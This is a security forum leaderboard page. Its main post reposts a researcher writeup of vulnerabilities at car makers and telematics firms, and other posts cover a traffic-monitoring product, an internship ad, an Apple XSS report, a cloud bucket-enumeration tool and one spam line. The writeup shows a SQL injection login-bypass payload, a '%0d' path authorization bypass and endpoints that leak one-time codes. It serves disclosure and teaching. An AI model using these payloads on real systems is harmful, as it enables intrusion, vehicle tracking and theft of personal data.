Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation since 01/05/23 in all areas

  1. Salut a todos, Am un proiect pe partea de CyberSecurity, la care lucrez de ceva timp impreuna cu un fost coleg de munca si pe care as vrea sa vi-l prezit si voua cu speranta in a veni si a-l testa. Am fost si la Defcamp unde am avut un stand (multumim @Andrei cu aceasta ocazie) si am rulat un program de BugBounty (care inca e valid - cine gaseste un bug valid il raporteaza si in functie de severitate vom premia cu vouchere Emag) Pe scurt, este vorba de https://razdon.com , un website care va ofera posibilitatea de a "onboardui" si a veda traficul vostru LIVE cu un extra context de securitate la fiecare request. Aceasta parte de live este prezentata sub forma unui dashboard unde poti vedea harta lumii si toate request-urile venind spre locatia serverului tau. Aveti un screenshot atasat mai jos: Dupa cum vedeti proiectul a fost dezvoltat pe RST si aici puteti vedea un window de aproximativ 8 ore cu toate statisticiile legate de RST in aceste 8 ore + traficul live, bineinteles. Pe langa partea de dashboard live, care necesita interactiune minima (practic este doar selectia site-ului in scop - in cazul in care aveti mai multe), avem si partea de analiza de trafic. In partea de analiza de trafic ai optiunea de a cauta in toate request-urile pe o anumita perioada de timp dupa ceva anume (ex. toate requesturile cu status code 4XX or 3XX). In partea de analiza este prezenta si un scurt istoric al atacurilor recente (cu tot cu tipul lor) Puteti vedea o bucata din acesta pagina mai jos: Un alt meniu destul de interesat este cel cu partea de certificate SSL, unde va puteti verifica data de expirare a certificatului (iar pe viitor vom implementa si sistem de alerte - atat la certificate cat si la atacuri). Un screenshot cu partea de certificate mai jos: Putem implementa si partea de WAF, dar momentan avem 0 focus in aceasta directie. Foarte curand vom face release si la un beta pe partea de artificial intelligence / machine learning, cu ajutorul carora vom maximiza eficienta detectarii atacurilor. Acestea fiind spuse, daca cineva este interesat de un asemenea produs, inregistrariile sunt deschise si puteti urma pasii necesari pentru a viziona traficul. Pentru a evita intrebariile de tipul cum faceti asta, va informez de pe acum ca singurul lucru care e necesar pentru aceste actiun sunt logurile de apache, respectiv nginx cu traficul website-ului. Momentan preluam aceste loguri cu un binar scris in GO (pentru eficienta) dar voi pune si varianta (raw) cea de a trimite catre API-ul nostru log-urile fara a rula un binar (safety reasons). O mica schema pentru a intelege mai bine cum sta treaba aveti jos. Mersi si o seara faina! P.S. In caz ca vrea sa ne cumpere careva cu vreo 2-3 mil de euro sa-mi dea un MP, dupaia e mai scump.
    8 points
  2. Salut, În compania unde lucrez s-a deschis recent un program de internship pentru persoanele pasionate de cyber-security sau cei care și-ar dori să înceapă o carieră în acest domeniu. Acesta este destinat în special studenților din facultățile cu profil de tehnic sau info, care încă studiază sau au absolvit și își doresc să se orienteze către zona de securitate cibernetică. Deși lucrez aici și s-ar putea spune că sunt subiectiv, mi se pare foarte tare că nu este necesară niciun fel de experiență în zona de cyber-security, că ai posibilitatea să urmezi acest internship de unde îți dorești (remote/hybrid/birou) și ai posibilitatea să începi un drum într-un domeniu dinamic (și căutat) fiind ghidat de oameni cu experiență. În plus vei putea învăța și practica metodele pe care le folosesc hackerii atunci când testează securitatea sistemelor dar și strategiile de apărare ale companiilor împotriva atacurilor cibernetice. Mai multe detalii vă las pe voi să descoperiți accesând pagina cu rolul: AICI Și bineînțeles, la sfârșitul internship-ului internii care ni se alătură pot să devină colegii noștri permanenți Dacă sunteți interesați și ați dori mai multe detalii, vă rog să lăsați un comment și vă voi răspunde în limita în care îmi permite timpul.
    7 points
  3. Raportat. Astept sa vedem ce si cum.
    6 points
  4. filme porno xxx 2023 online subtitrate in romana
    6 points
  5. Daca știa Sadoveanu ca o sa apară generațiile voastre de bătuți in cap ....
    5 points
  6. Probabil o licența de windows. De vreo 10 ani a început sa fie mai mult prostituție asta
    4 points
  7. Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More January 3, 2023 samwcyo During the fall of 2022, a few friends and I took a road trip from Chicago, IL to Washington, DC to attend a cybersecurity conference and (try) to take a break from our usual computer work. While we were visiting the University of Maryland, we came across a fleet of electric scooters scattered across the campus and couldn't resist poking at the scooter's mobile app. To our surprise, our actions caused the horns and headlights on all of the scooters to turn on and stay on for 15 minutes straight. When everything eventually settled down, we sent a report over to the scooter manufacturer and became super interested in trying to more ways to make more things honk. We brainstormed for a while, and then realized that nearly every automobile manufactured in the last 5 years had nearly identical functionality. If an attacker were able to find vulnerabilities in the API endpoints that vehicle telematics systems used, they could honk the horn, flash the lights, remotely track, lock/unlock, and start/stop vehicles, completely remotely. At this point, we started a group chat and all began to work with the goal of finding vulnerabilities affecting the automotive industry. Over the next few months, we found as many car-related vulnerabilities as we could. The following writeup details our work exploring the security of telematic systems, automotive APIs, and the infrastructure that supports it. Findings Summary During our engagement, we found the following vulnerabilities in the companies listed below: Kia, Honda, Infiniti, Nissan, Acura Fully remote lock, unlock, engine start, engine stop, precision locate, flash headlights, and honk vehicles using only the VIN number Fully remote account takeover and PII disclosure via VIN number (name, phone number, email address, physical address) Ability to lock users out of remotely managing their vehicle, change ownership For Kia’s specifically, we could remotely access the 360-view camera and view live images from the car Mercedes-Benz Access to hundreds of mission-critical internal applications via improperly configured SSO, including… Multiple Github instances behind SSO Company-wide internal chat tool, ability to join nearly any channel SonarQube, Jenkins, misc. build servers Internal cloud deployment services for managing AWS instances Internal Vehicle related APIs Remote Code Execution on multiple systems Memory leaks leading to employee/customer PII disclosure, account access Hyundai, Genesis Fully remote lock, unlock, engine start, engine stop, precision locate, flash headlights, and honk vehicles using only the victim email address Fully remote account takeover and PII disclosure via victim email address (name, phone number, email address, physical address) Ability to lock users out of remotely managing their vehicle, change ownership BMW, Rolls Royce Company-wide core SSO vulnerabilities which allowed us to access any employee application as any employee, allowed us to… Access to internal dealer portals where you can query any VIN number to retrieve sales documents for BMW Access any application locked behind SSO on behalf of any employee, including applications used by remote workers and dealerships Ferrari Full zero-interaction account takeover for any Ferrari customer account IDOR to access all Ferrari customer records Lack of access control allowing an attacker to create, modify, delete employee “back office” administrator user accounts and all user accounts with capabilities to modify Ferrari owned web pages through the CMS system Ability to add HTTP routes on api.ferrari.com (rest-connectors) and view all existing rest-connectors and secrets associated with them (authorization headers) Spireon Multiple vulnerabilities, including: Full administrator access to a company-wide administration panel with ability to send arbitrary commands to an estimated 15.5 million vehicles (unlock, start engine, disable starter, etc.), read any device location, and flash/update device firmware Remote code execution on core systems for managing user accounts, devices, and fleets. Ability to access and manage all data across all of Spireon Ability to fully takeover any fleet (this would’ve allowed us to track & shut off starters for police, ambulances, and law enforcement vehicles for a number of different large cities and dispatch commands to those vehicles, e.g. “navigate to this location”) Full administrative access to all Spireon products, including the following… GoldStar - https://www.spireon.com/products/goldstar/ LoJack - https://www.spireon.com/products/goldstar/lojackgo/ FleetLocate - https://www.spireon.com/products/fleetlocate-for-fleet-managers/ NSpire - https://www.spireon.com/spireon-nspire-platform/ Trailer & Asset - https://www.spireon.com/solutions/trailer-asset-managers/ In total, there were… 15.5 million devices (mostly vehicles) 1.2 million user accounts (end user accounts, fleet managers, etc.) Ford Full memory disclosure on production vehicle Telematics API discloses Discloses customer PII and access tokens for tracking and executing commands on vehicles Discloses configuration credentials used for internal services related to Telematics Ability to authenticate into customer account and access all PII and perform actions against vehicles Customer account takeover via improper URL parsing, allows an attacker to completely access victim account including vehicle portal Reviver Full super administrative access to manage all user accounts and vehicles for all Reviver connected vehicles. An attacker could perform the following: Track the physical GPS location and manage the license plate for all Reviver customers (e.g. changing the slogan at the bottom of the license plate to arbitrary text) Update any vehicle status to “STOLEN” which updates the license plate and informs authorities Access all user records, including what vehicles people owned, their physical address, phone number, and email address Access the fleet management functionality for any company, locate and manage all vehicles in a fleet Porsche Ability to send retrieve vehicle location, send vehicle commands, and retrieve customer information via vulnerabilities affecting the vehicle Telematics service Toyota IDOR on Toyota Financial that discloses the name, phone number, email address, and loan status of any Toyota financial customers Jaguar, Land Rover User account IDOR disclosing password hash, name, phone number, physical address, and vehicle information SiriusXM Leaked AWS keys with full organizational read/write S3 access, ability to retrieve all files including (what appeared to be) user databases, source code, and config files for Sirius Vulnerability Writeups (1) Full Account Takeover on BMW and Rolls Royce via Misconfigured SSO While testing BMW assets, we identified a custom SSO portal for employees and contractors of BMW. This was super interesting to us, as any vulnerabilities identified here could potentially allow an attacker to compromise any account connected to all of BMWs assets. For instance, if a dealer wanted to access the dealer portal at a physical BMW dealership, they would have to authenticate through this portal. Additionally, this SSO portal was used to access internal tools and related devops infrastructure. The first thing we did was fingerprint the host using OSINT tools like gau and ffuf. After a few hours of fuzzing, we identified a WADL file which exposed API endpoints on the host via sending the following HTTP request: GET /rest/api/application.wadl HTTP/1.1 Host: xpita.bmwgroup.com The HTTP response contained all available REST endpoints on the xpita host. We began enumerating the endpoints and sending mock HTTP requests to see what functionality was available. One immediate finding was that we were able to query all BMW user accounts via sending asterisk queries in the user field API endpoint. This allowed us to enter something like “sam*” and retrieve the user information for a user named “sam.curry” without having to guess the actual username. HTTP Request GET /reset/api/users/example* HTTP/1.1 Host: xpita.bmwgroup.com HTTP Response HTTP/1.1 200 OK Content-type: application/json {“id”:”redacted”,”firstName”:”Example”,”lastName”:”User”,”userName”:”example.user”} Once we found this vulnerability, we continued testing the other accessible API endpoints. One particularly interesting one which stood out immediately was the “/rest/api/chains/accounts/:user_id/totp” endpoint. We noticed the word “totp” which usually stood for one-time password generation. When we sent an HTTP request to this endpoint using the SSO user ID gained from the wildcard query paired with the TOTP endpoint, it returned a random 7-digit number. The following HTTP request and response demonstrate this behavior: HTTP Request GET /rest/api/chains/accounts/unique_account_id/totp HTTP/1.1 Host: xpita.bmwgroup.com HTTP Response HTTP/1.1 200 OK Content-type: text/plain 9373958 For whatever reason, it appeared that this HTTP request would generate a TOTP for the user’s account. We guessed that this interaction worked with the “forgot password” functionality, so we found an example user account by querying “example*” using our original wildcard finding and retrieving the victim user ID. After retrieving this ID, we initiated a reset password attempt for the user account until we got to the point where the system requested a TOTP code from the user’s 2FA device (e.g. email or phone). At this point, we retrieved the TOTP code generated from the API endpoint and entered it into the reset password confirmation field. It worked! We had reset a user account, gaining full account takeover on any BMW employee and contractor user. At this point, it was possible to completely take over any BMW or Rolls Royce employee account and access tools used by those employees. To demonstrate the impact of the vulnerability, we simply Googled “BMW dealer portal” and used our account to access the dealer portal used by sales associates working at physical BMW and Rolls Royce dealerships. After logging in, we observed that the demo account we took over was tied to an actual dealership, and we could access all of the functionality that the dealers themselves had access to. This included the ability to query a specific VIN number and retrieve sales documents for the vehicle. With our level of access, there was a huge amount of functionality we could’ve performed against BMW and Rolls Royce customer accounts and customer vehicles. We stopped testing at this point and reported the vulnerability. The vulnerabilities reported to BMW and Rolls Royce have since been fixed. (2) Remote Code Execution and Access to Hundreds of Internal Tools on Mercedes-Benz and Rolls Royce via Misconfigured SSO Early in our testing, someone in our group had purchased a Mercedes-Benz vehicle and so we began auditing the Mercedes-Benz infrastructure. We took the same approach as BMW and began testing the Mercedes-Benz employee SSO. We weren’t able to find any vulnerabilities affecting the SSO portal itself, but by exploring the SSO website we observed that they were running some form of LDAP for the employee accounts. Based on our high level understanding of their infrastructure, we guessed that the individual employee applications used a centralized LDAP system to authenticate users. We began exploring each of these websites in an attempt to find a public registration so we could gain SSO credentials to access, even at a limited level, the employee applications. After fuzzing random sites for a while, we eventually found the “umas.mercedes-benz.com” website which was built for vehicle repair shops to request specific tools access from Mercedes-Benz. The website had public registration enabled as it was built for repair shops and appeared to write to the same database as the core employee LDAP system. We filled out all the required fields for registration, created a user account, then used our recon data to identify sites which redirected to the Mercedes-Benz SSO. The first one we attempted was a pretty obvious employee tool, it was “git.mercedes-benz.com”, short for Github. We attempted to use our user credentials to sign in to the Mercedes-Benz Github and saw that we were able to login. Success! The Mercedes-Benz Github, after authenticating, asked us to set up 2FA on our account so we could access the app. We installed the 2FA app and added it to our account, entered our code, then saw that we were in. We had access to “git.mercedes-benz.com” and began looking around. After a few minutes, we saw that the Github instance had internal documentation and source code for various Mercedes-Benz projects including the Mercedes Me Connect app which was used by customers to remotely connect to their vehicles. The internal documentation gave detailed instructions for employees to follow if they wanted to build an application for Mercedes-Benz themselves to talk to customer vehicles and the specific steps one would have to take to talk to customer vehicles. At this point, we reported the vulnerability, but got some pushback after a few days of waiting on an email response. The team seemed to misunderstand the impact, so they asked us to demonstrate further impact. We used our employee account to login to numerous applications which contained sensitive information and achieved remote code execution via exposed actuators, spring boot consoles, and dozens of sensitive internal applications used by Mercedes-Benz employees. One of these applications was the Mercedes-Benz Mattermost (basically Slack). We had permission to join any channel, including security channels, and could pose as a Mercedes-Benz employee who could ask whatever questions necessary for an actual attacker to elevate their privileges across the Benz infrastructure. To give an overview, we could access the following services: Multiple employee-only Githubs with sensitive information containing documentation and configuration files for multiple applications across the Mercedes-Benz infrastructure Spring boot actuators which lead to remote code execution, information disclosure, on sensitive employee and customer facing applications Jenkins instances AWS and cloud-computing control panels where we could request, manage, and access various internal systems XENTRY systems used to communicate with customer vehicles Internal OAuth and application-management related functionality for configuring and managing internal apps Hundreds of miscellaneous internal services (3) Full Vehicle Takeover on Kia via Deprecated Dealer Portal When we looked at Kia, we noticed how its vehicle enrollment process was different from its parent company Hyundai. We mapped out all of the domains and we came across the “kdelaer.com” domain where dealers are able to register for an account to activate Kia connect for customers who purchase vehicles. At this point, we found the domain “kiaconnect.kdealer.com” which allowed us to enroll an arbitrary VIN but required a valid session to work. While looking at the website’s main.js code, we observed the following authorization functionality for generating the token required to access the website functionality: validateSSOToken() { const e = this.geturlParam("token"), i = this.geturlParam("vin"); return this.postOffice({ token: e, vin: i }, "/prof/gbl/vsso", "POST", "preLogin").pipe(ye(this.processSuccessData), Nn(this.handleError)) } Since we didn’t have valid authorization credentials, we continued to search through the JavaScript file until finding the “prelogin” header. This header, when sent, allowed us to initiate enrollment for an arbitrary VIN number. Although we were able to bypass the authorization check for VIN ownership, the website continued throwing errors for an invalid session. To bypass this, we took a session token from “owners.kia.com” (the site used for customers to remotely connect to their vehicles) and appended it to our request to pair the VIN number to a customer account here: Something really interesting to note: for every Kia account that we queried, the server returned an associated profile with the email “daspike11@yahoo.com”. We’re not sure if this email address has access to the user account, but based on our understanding of the Kia website it appeared that the email address was connected to every account that we had searched. We’ve asked the Kia team for clarification but haven’t heard back on what exactly this is. Now that we had a valid vehicle initialization session, we could use the JSON returned in the HTTP response returned from pairing the customer’s account to continue the vehicle takeover. We would use the “prelogin” header once again to generate a dealer token (intended to be accessed by Kia dealers themselves) to pair any vehicle to the attacker’s customer account. Lastly, we can just head to the link to finish the activation and enrollment which you can see below here. The attacker will receive a link via email on their Kia customer account after the above dealer pairing process is completed. The activation portal below is the final step to pair the Kia vehicle to the attacker’s customer account. Lastly, after we’ve filled out the above form, it takes about 1-2 minutes for Kia Connect to fully activate and give full access to send lock, unlock, remote start, remote stop, locate, and (most interestingly) remotely access vehicle cameras! (4) Full Account Takeover on Ferrari and Arbitrary Account Creation allows Attacker to Access, Modify, and Delete All Customer Information and Access Administrative CMS Functionality to Manage Ferrari Websites When we began targeting Ferrari, we mapped out all domains under the publicly available domains like “ferrari.com” and browsed around to see what was accessible. One target we found was “api.ferrari.com”, a domain which offered both customer facing and internal APIs for Ferrari systems. Our goal was to get the highest level of access possible for this API. We analyzed the JavaScript present on several Ferrari subdomains that looked like they were for use by Ferrari dealers. These subdomains included `cms-dealer.ferrari.com`, `cms-new.ferrari.com` and `cms-dealer.test.ferrari.com`. One of the patterns we notice when testing web applications is poorly implemented single sign on functionality which does not restrict access to the underlying application. This was the case for the above subdomains. It was possible to extract the JavaScript present for these applications, allowing us to understand the backend API routes in use. When reverse engineering JavaScript bundles, it is important to check what constants have been defined for the application. Often these constants contain sensitive credentials or at the very least, tell you where the backend API is, that the application talks to. For this application, we noticed the following constants were set: const i = { production: !0, envName: "production", version: "0.0.0", build: "20221223T162641363Z", name: "ferrari.dws-preowned.backoffice", formattedName: "CMS SPINDOX", feBaseUrl: "https://{{domain}}.ferraridealers.com/", fePreownedBaseUrl: "https://{{domain}}.ferrari.com/", apiUrl: "https://api.ferrari.com/cms/dws/back-office/", apiKey: "REDACTED", s3Bucket: "ferrari-dws-preowned-pro", cdnBaseUrl: "https://cdn.ferrari.com/cms/dws/media/", thronAdvUrl: "https://ferrari-app-gestioneautousate.thron.com/?fromSAML#/ad/" } From the above constants we can understand that the base API URL is `https://api.ferrari.com/cms/dws/back-office/` and a potential API key for this API is `REDACTED`. Digging further into the JavaScript we can look for references to `apiUrl` which will inform us as to how this API is called and how the API key is being used. For example, the following JavaScript sets certain headers if the API URL is being called: })).url.startsWith(x.a.apiUrl) && !["/back-office/dealers", "/back-office/dealer-settings", "/back-office/locales", "/back-office/currencies", "/back-office/dealer-groups"].some(t => !!e.url.match(t)) && (e = (e = e.clone({ headers: e.headers.set("Authorization", "" + (s || void 0)) })).clone({ headers: e.headers.set("x-api-key", "" + a) })); All the elements needed for this discovery were conveniently tucked away in this JavaScript file. We knew what backend API to talk to and its routes, as well as the API key we needed to authenticate to the API. Within the JavaScript, we noticed an API call to `/cms/dws/back-office/auth/bo-users`. When requesting this API through Burp Suite, it leaked all of the users registered for the Ferrari Dealers application. Furthermore, it was possible to send a POST request to this endpoint to add ourselves as a super admin user. While impactful, we were still looking for a vulnerability that affected the broader Ferrari ecosystem and every end user. Spending more time deconstructing the JavaScript, we found some API calls were being made to `rest-connectors`: return t.prototype.getConnectors = function() { return this.httpClient.get("rest-connectors") }, t.prototype.getConnectorById = function(t) { return this.httpClient.get("rest-connectors/" + t) }, t.prototype.createConnector = function(t) { return this.httpClient.post("rest-connectors", t) }, t.prototype.updateConnector = function(t, e) { return this.httpClient.put("rest-connectors/" + t, e) }, t.prototype.deleteConnector = function(t) { return this.httpClient.delete("rest-connectors/" + t) }, t.prototype.getItems = function() { return this.httpClient.get("rest-connector-models") }, t.prototype.getItemById = function(t) { return this.httpClient.get("rest-connector-models/" + t) }, t.prototype.createItem = function(t) { return this.httpClient.post("rest-connector-models", t) }, t.prototype.updateItem = function(t, e) { return this.httpClient.put("rest-connector-models/" + t, e) }, t.prototype.deleteItem = function(t) { return this.httpClient.delete("rest-connector-models/" + t) }, t The following request unlocked the final piece in the puzzle. Sending the following request revealed a treasure trove of API credentials for Ferrari: : GET /cms/dws/back-office/rest-connector-models HTTP/1.1 To explain what this endpoint's purpose was: Ferrari had configured a number of backend APIs that could be communicated with by hitting specific paths. When hitting this API endpoint, it returned this list of API endpoints, hosts and authorization headers (in plain text). This information disclosure allowed us to query Ferrari’s production API to access the personal information of any Ferrari customer. In addition to being able to view these API endpoints, we could also register new rest connectors or modify existing ones. HTTP Request GET /core/api/v1/Users?email=ian@ian.sh HTTP/1.1 Host: fcd.services.ferrari.com HTTP Response HTTP/1.1 200 OK Content-type: application/json …"guid":"2d32922a-28c4-483e-8486-7c2222b7b59c","email":"ian@ian.sh","nickName":"ian@ian.sh","firstName":"Ian","lastName":"Carroll","birthdate":"1963-12-11T00:00:00"… The API key and production endpoints that were disclosed using the previous staging API key allowed an attacker to access, create, modify, and delete any production user account. It additionally allowed an attacker to query users via email address or nickname. Additionally, an attacker could POST to the “/core/api/v1/Users/:id/Roles” endpoint to edit their user roles, setting themselves to have super-user permissions or become a Ferrari owner. This vulnerability would allow an attacker to access, modify, and delete any Ferrari customer account with access to manage their vehicle profile. (5) SQL Injection and Regex Authorization Bypass on Spireon Systems allows Attacker to Access, Track, and Send Arbitrary Commands to 15 million Telematics systems and Additionally Fully Takeover Fleet Management Systems for Police Departments, Ambulance Services, Truckers, and Many Business Fleet Systems When identifying car-related targets to hack on, we found the company Spireon. In the early 90s and 2000s, there were a few companies like OnStar, Goldstar, and FleetLocate which were standalone devices which were put into vehicles to track and manage them. The devices have the capabilities to be tracked and receive arbitrary commands, e.g. locking the starter so the vehicle cannot start. Sometime in the past, Spireon had acquired many GPS Vehicle Tracking and Management Companies and put them under the Spireon parent company. We read through the Spireon marketing and saw that they claimed to have over 15 million connected vehicles. They offered services directly to customers and additionally many services through their subsidiary companies like OnStar. We decided to research them as, if an attacker were able to compromise the administration functionality for these devices and fleets, they would be able to perform actions against over 15 million vehicles with very interesting functionalities like sending a cities police officers a dispatch location, disabling vehicle starters, and accessing financial loan information for dealers. Our first target for this was very obvious: admin.spireon.com The website appeared to be a very out of date global administration portal for Spireon employees to authenticate and perform some sort of action. We attempted to identify interesting endpoints which were accessible without authorization, but kept getting redirected back to the login. Since the website was so old, we tried the trusted manual SQL injection payloads but were kicked out by a WAF that was installed on the system We switched to a much simpler payload: sending an apostrophe, seeing if we got an error, then sending two apostrophes and seeing if we did not get an error. This worked! The system appeared to be reacting to sending an odd versus even number of apostrophes. This indicated that our input in both the username and password field was being passed to a system which could likely be vulnerable to some sort of SQL injection attack. For the username field, we came up with a very simple payload: victim' # The above payload was designed to simply cut off the password check from the SQL query. We sent this HTTP request to Burp Suite’s intruder with a common username list and observed that we received various 301 redirects to “/dashboard” for the username “administrator” and “admin”. After manually sending the HTTP request using the admin username, we observed that we were authenticated into the Spireon administrator portal as an administrator user. At this point, we browsed around the application and saw many interesting endpoints. The functionality was designed to manage Spireon devices remotely. The administrator user had access to all Spireon devices, including those of OnStar, GoldStar, and FleetLocate. We could query these devices and retrieve the live location of whatever the devices were installed on, and additionally send arbitrary commands to these devices. There was additional functionality to overwrite the device configuration including what servers it reached out to download updated firmware. Using this portal, an attacker could create a malicious Spireon package, update the vehicle configuration to call out to the modified package, then download and install the modified Spireon software. At this point, an attacker could backdoor the Spireon device and run arbitrary commands against the device. Since these devices were very ubiquitous and were installed on things like tractors, golf carts, police cars, and ambulances, the impact of each device differed. For some, we could only access the live GPS location of the device, but for others we could disable the starter and send police and ambulance dispatch locations. We reported the vulnerability immediately, but during testing, we observed an HTTP 500 error which disclosed the API URL of the backend API endpoint that the “admin.spireon.com” service reached out to. Initially, we dismissed this as we assumed it was internal, but after circling back we observed that we could hit the endpoint and it would trigger an HTTP 403 forbidden error. Our goal now was seeing if we could find some sort of authorization bypass on the host and what endpoints were accessible. By bypassing the administrator UI, we could directly reach out to each device and have direct queries for vehicles and user accounts via the backend API calls. We fuzzed the host and eventually observed some weird behavior: By sending any string with “admin” or “dashboard”, the system would trigger an HTTP 403 forbidden response, but would return 404 if we didn’t include this string. As an example, if we attempted to load “/anything-admin-anything” we’d receive 403 forbidden, while if we attempted to load “/anything-anything” it would return a 404. We took the blacklisted strings, put them in a list, then attempted to enumerate the specific endpoints with fuzzing characters (%00 to %FF) stuck behind the first and last characters. During scanning, we saw that the following HTTP requests would return a 200 OK response: GET /%0dadmin GET /%0ddashboard Through Burp Suite, we sent the HTTP response to our browser and observed the response: it was a full administrative portal for the core Spireon app. We quickly set up a match and replace rule to modify GET /admin and GET /dashboard to the endpoints with the %0d prefix. After setting up this rule, we could browse to “/admin” or “/dashboard” and explore the website without having to perform any additional steps. We observed that there were dozens of endpoints which were used to query all connected vehicles, send arbitrary commands to connected vehicles, and view all customer tenant accounts, fleet accounts, and customer accounts. We had access to everything. At this point, a malicious actor could backdoor the 15 million devices, query what ownership information was associated with a specific VIN, retrieve the full user information for all customer accounts, and invite themselves to manage any fleet which was connected to the app. For our proof of concept, we invited ourselves to a random fleet account and saw that we received an invitation to administrate a US Police Department where we could track the entire police fleet. (6) Mass Assignment on Reviver allows an Attacker to Remotely Track and Overwrite the Virtual License Plates for All Reviver Customers, Track and Administrate Reviver Fleets, and Access, Modify, and Delete All User Information In October, 2022, California announced that it had legalized digital license plates. We researched this for a while and found that most, if not all of the digital license plates, were done through a company called Reviver. If someone wanted a digital license plate, they’d buy the virtual Reviver license plate which included a SIM card for remotely tracking and updating the license plate. Customers who uses Reviver could remotely update their license plates slogan, background, and additionally report if the car had been stolen via setting the plate tag to “STOLEN”. Since the license plate could be used to track vehicles, we were super interested in Reviver and began auditing the mobile app. We proxied the HTTP traffic and saw that all API functionality was done on the "pr-api.rplate.com" website. After creating a user account, our user account was assigned to a unique “company” JSON object which allowed us to add other sub-users to our account. The company JSON object was super interesting as we could update many of the JSON fields within the object. One of these fields was called “type” and was default set to “CONSUMER”. After noticing this, we dug through the app source code in hopes that we could find another value to set it to, but were unsuccessful. At this point, we took a step back and wondered if there was an actual website we could talk to versus proxying traffic through the mobile app. We looked online for a while before getting the idea to perform a reset password on our account which gave us a URL to navigate to. Once we opened the password reset URL, we observed that the website had tons of functionality including the ability to administer vehicles, fleets, and user accounts. This was super interesting as we now had a lot more API endpoints and functionality to access. Additionally, the JavaScript on the website appeared to have the names of the other roles that our user account could be (e.g. specialized names for user, moderator, admin, etc.) We queried the “CONSUMER” string in the JavaScript and saw that there were other roles that were defined in the JavaScript. After attempting to update our “role” parameter to the disclosed “CORPORATE” role, we refreshed out profile metadata, then saw that it was successful! We were able to change our roles to ones other than the default user account, opening the door to potential privilige escalation vulnerabilities. It appeared that, even though we had updated our account to the "CORPORATE" role, we were still receiving authorization vulnerabilities when logging into the website. We thought for a while until realizing that we could invite users to our modified account which had the elevated role, which may then grant the invited users the required permissions since they were invited via an intended way versus mass assigning an account to an elevated role. After inviting a new account, accepting the invitation, and logging into the account, we observed that we no longer received authorization errors and could access fleet management functionality. This meant that we could likely (1) mass assign our account to an even higher elevated role (e.g. admin), then (2) invite a user to our account which would be assigned the appropriate permissions. This perplexed us as there was likely some administration group which existed in the system but that we had not yet identified. We brute forced the “type” parameter using wordlists until we noticed that setting our group to the number “4” had updated our role to “REVIVER_ROLE”. It appeared that the roles were indexed to numbers, and we could simply run through the numbers 0-100 and find all the roles on the website. The “0” role was the string “REVIVER”, and after setting this on our account and re-inviting a new user, we logged into the website normally and observed that the UI was completely broken and we couldn’t click any buttons. From what we could guess, we had the administrator role but were accessing the account using the customer facing frontend website and not the appropriate administrator frontend website. We would have to find the endpoints used by administrators ourselves. Since our administrator account theoretically had elevated permissions, our first test was simply querying a user account and seeing if we could access someone else's data: this worked! We could take any of the normal API calls (viewing vehicle location, updating vehicle plates, adding new users to accounts) and perform the action using our super administrator account with full authorization. At this point, we reported the vulnerability and observed that it was patched in under 24 hours. An actual attacker could remotely update, track, or delete anyone’s REVIVER plate. We could additionally access any dealer (e.g. Mercedes-Benz dealerships will often package REVIVER plates) and update the default image used by the dealer when the newly purchased vehicle still had DEALER tags. The Reviver website also offered fleet management functionality which we had full access to. (7) Full Remote Vehicle Access and Full Account Takeover affecting Hyundai and Genesis This vulnerability was written up on Twitter and can be accessed on the following thread: (8) Full Remote Vehicle Access and Full Account Takeover affecting Honda, Nissan, Infiniti, Acura This vulnerability was written up on Twitter and can be accessed on the following thread: (9) Full Vehicle Takeover on Nissan via Mass Assignment This vulnerability was written up on Twitter and can be accessed on the following thread: Credits The following people contributed towards this project: Sam Curry (https://twitter.com/samwcyo) Neiko Rivera (https://twitter.com/_specters_) Brett Buerhaus (https://twitter.com/bbuerhaus) Maik Robert (https://twitter.com/xEHLE_) Ian Carroll (https://twitter.com/iangcarroll) Justin Rhinehart (https://twitter.com/sshell_) Shubham Shah (https://twitter.com/infosec_au) Special thanks to the following people who helped create this blog post: Ben Sadeghipour (https://twitter.com/nahamsec) Joseph Thacker (https://twitter.com/rez0__) Sursa: https://samcurry.net/web-hackers-vs-the-auto-industry/
    4 points
  8. Un XSS Reflected in www.apple.com. Raportul a fost acceptat. Nu sunt sigur daca o sa primesc vreo recompensa, dar am sa va zic. Issues eligible for public acknowledgment. We review all issues reported to us, and all legitimate services issues are eligible for public acknowledgement. While we request that you report all issues, the following issues are eligible for bounty reward payments only if they’re evaluated as novel or high impact based on Apple’s discretion. Open Redirects Reflected or Self XSS Bugs requiting exceeding unlikely user interaction Cross-site request forgery vulnerabilities where the only impact is logout Banner Grabbing or Service Versions without a vulnerability or PoC Rate Limiting unless credentials are able to be guessed External and Public Credential Dumps Denial of Service vulnerabilities Username enumeration unless some personal identifiable information is disclosed like email or phone number Report from automated tools or scanners where the vulnerability is not proven Expired Certificates DMARC/SPF Misconfiguration concerns Social engineering Properties that are not owned or operated by Apple Link: https://security.apple.com/bounty/categories/
    3 points
  9. CloudBrute A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike. The complete writeup is available. here At a glance Motivation While working on HunterSuite, and as part of the job, we are always thinking of something we can automate to make black-box security testing easier. We discussed this idea of creating a multiple platform cloud brute-force hunter.mainly to find open buckets, apps, and databases hosted on the clouds and possibly app behind proxy servers. Here is the list issues we tried to fix: separated wordlists lack of proper concurrency lack of supporting all major cloud providers require authentication or keys or cloud CLI access outdated endpoints and regions Incorrect file storage detection lack support for proxies (useful for bypassing region restrictions) lack support for user agent randomization (useful for bypassing rare restrictions) hard to use, poorly configured Features Cloud detection (IPINFO API and Source Code) Supports all major providers Black-Box (unauthenticated) Fast (concurrent) Modular and easily customizable Cross Platform (windows, linux, mac) User-Agent Randomization Proxy Randomization (HTTP, Socks5) Supported Cloud Providers Microsoft: Storage Apps Amazon: Storage Apps Google: Storage Apps DigitalOcean: storage Vultr: Storage Linode: Storage Alibaba: Storage Version 1.0.0 Usage Just download the latest release for your operation system and follow the usage. To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.YAML file in there. It looks like this providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations proxytype: "http" # socks5 / http ipinfo: "" # IPINFO.io API KEY For IPINFO API, you can register and get a free key at IPINFO, the environments used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc. We provided some wordlist out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool. After setting up your API key, you are ready to use 